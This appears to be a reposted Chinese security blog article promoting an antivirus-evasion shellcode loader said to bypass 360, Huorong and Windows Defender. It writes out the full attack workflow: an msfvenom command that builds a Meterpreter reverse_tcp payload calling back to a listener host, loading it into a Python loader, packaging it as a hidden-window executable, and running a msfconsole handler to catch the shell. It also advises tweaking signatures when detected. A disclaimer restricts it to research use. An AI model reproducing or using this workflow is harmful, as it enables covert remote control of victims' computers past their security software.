免杀ShellCode加载器 ,360、火绒、Windows Defender
2022-8-29 08:10:25 Author: 系统安全运维(查看原文) 阅读量:56 收藏

Bypass_AV msf免杀,ShellCode免杀加载器 ,免杀shellcode执行程序 ,360&火绒&Windows Defender

代码够简单,估计要不了多久就进特征库了,被杀了再去改几个特征码照样又可以免杀,作者的github保持更新,可以去瞅瞅。

项目地址:https://github.com/Axx8/Bypass_AV

环境

2022年5月8日 测试可以免杀国内杀软 火绒&360及Windows DefenderWindows 10 64位 360&火绒&Windows DefenderWindows 7 64位 或以上操作系统应该都没问题(没有测试)

该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!

代码未经过大量测试,如发现问题请提交 issue。

使用msfvenom

生成ShellCode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.100 lport=8080 --encrypt base64 -f c

注意:ShellCode 需要是64位的

加载器

将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处

注意:保留原始ShellCode 里的双引号 "

示例:

最终格式:

打包成可执行程序

编译

Python 3.8.6

pyinstaller 4.7

pip install pyinstaller pyinstaller -F -w Bypss_AV.py

生成Bypass_AV.exe在dist目录中

运行监听

msfconsolemsf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 0.0.0.0msf6 exploit(multi/handler) > set lport 8080msf6 exploit(multi/handler) > run

Bypass_360视频

https://user-images.githubusercontent.com/34683107/167286823-a93fdd69-547e-4adc-9ae5-171fb0e919ca.mov

Bypass_火绒视频

https://user-images.githubusercontent.com/34683107/167286897-a482c486-c3e9-4f69-ae55-98afd2ff1ed7.mov

Bypass_Windows Defender视频

https://user-images.githubusercontent.com/34683107/167286874-9413611e-c2be-4cfb-ba51-f95ebe5518af.mov

或者直接去作者的github上查看

声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本公众号及原作者不承担相应的后果.

好文推荐

信息收集常用的工具

几款实用的内网穿透工具

实战挖掘一个某公司网站漏洞

渗透测试报告自动生成工具 -- Savior

Spring 框架相关漏洞合集 | 红队技术

一款漏洞查找器(挖漏洞的有力工具)

神兵利器 | 分享 直接上手就用的内存马(附下载)

推荐一款自动向hackerone发送漏洞报告的扫描器

欢迎关注 系统安全运维


文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247508939&idx=2&sn=4855ac32ba6e9c56b4fcd9a1d5ea0974&chksm=c30870bbf47ff9ad3e05067068126ae733a43b473d71bee66f5aa4d21827831db84126640400#rd
如有侵权请联系:admin#unsafe.sh